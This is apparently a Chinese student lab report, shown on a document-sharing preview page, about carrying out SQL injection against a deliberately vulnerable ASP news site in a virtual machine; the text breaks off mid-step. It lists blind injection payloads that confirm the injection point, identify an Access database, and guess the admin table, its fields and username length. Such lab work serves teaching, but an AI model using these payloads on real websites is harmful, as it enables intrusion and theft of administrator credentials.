SQL注入攻击实验报告.docVIP

  1. 1、本文档共15页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
- PAGE 1 - 实验报告 (实验名称 :SQL注入攻击) 一、实验目的 通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加强对Web攻击的防范。 二、实验环境 描述实验开展所基于的网络环境,给出网络拓扑、IP地址、web服务器、客户机等信息。 宿主机(客户机):操作系统为Windows 10,IP为1,在主机上安装虚拟化软件 Vmware Player,在此基础上创建虚拟机并安装操作系统,进行网络配置,采用环回适配器,桥接模式,实现宿主机与虚拟机之间的网络通信, 虚拟机(Web服务器):操作系统为Windows XP,IP为, 本实验利用 windows 的 iis 服务搭建了一个有 SQL 注入漏洞的网站“ASP 新闻发 布系统”,以该网站为目标,对其实施 SQL 注入攻击。 本实验所需工具如下: IIS 是 Internet Information Server 的缩写,是微软提供的 Internet 服务器软 件,包括 Web、FTP、Mail 等服务器,也是目前常用的服务器软件。版本不限。 “啊 D”注入工具:对“MSSQL 显错模式”、“MSSQL 不显错模式”、“Access”等数 据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫描”、“管理入口检测”、 “目录查看”等等于一身的注入工具包。 “ASP 新闻发布系统”Ok3w v4.6 源码。 三、实验内容 (一)配置实验环境, 首先选择网络适配器,安装环回适配器,在主机上安装Vmware Player,成功启动虚拟机。接着配置宿主机和虚拟机的IP,如图 要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge 然后,验证宿主机和虚拟机是否联通,结果显示连接成功。 最后在虚拟机上安装IIS程序,打开浏览器,输入地址“”,检查网站搭建情况。成功! (二)寻找注入点 在宿主机上,打开网页/list.asp?id=95,可以正常打开页面。 进行注入测试,键入 /list.asp?id=95 and 1=1,返回页面不变。 键入 /list.asp?id=95 and 1=2,返回页面出错。 因此,可确定该网站存在注入点。 (三)判断数据库类型 用系统表的方法进行判断,分别键入 /list.asp?id=95 and (select count(*) from sysobjects)0 /list.asp?id=95 and (select count(*) from msysobjects)0 两者返回均出错,可知是 access 数据库。 (四)猜测表名 一般网站后台的管理员都默认在表 admin 中,我们先试一下,键入: /list.asp?id=95 and (select count(*) from admin)0 返回页面正常,可知该网站后台数据库中存在着表名为 admin 的表。 (五)猜测字段名不同公司网站有不同的字段名,但一般都有三个字段,分别记录 ID 号、用户名和密码,常用的字段名为:id,username,password。 分别键入 /list.asp?id=95 and (select count(id) from admin)0 /list.asp?id=95 and (select count(username) from admin)0 /list.asp?id=95 and (select count(password) from admin)0 三者返回均正常。 可知,表 admin 中存在的三个字段:id,username,password。 注:“username”的截图损坏,但是返回正常,望教员通融。 (六)猜测管理员用户名和密码 1.确定表 admin 中有几条记录,键入 /list.asp?id=95 and (select count(*) from admin)=1 返回页面正常。 可知,表 admin 只有一条记录。 2.猜测用户名长度,键入 /list.asp?id=95 and (select len(username) from admin)=1 返回出错,继续键入 /list.asp?id=95 and (select len(username) from admin)=2 返回出错,继续测试 3/4/5…, 直到返回页面正确。测试到 5 的时候,返回正常。可知,用户名长度为 5。 3.猜测用户名内容,采用 ASCII 码分析法先猜测第1 位,用二分法,键入 /list.asp?id=95 and (select count(*) from admin whe

文档评论(0)

ma982890 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档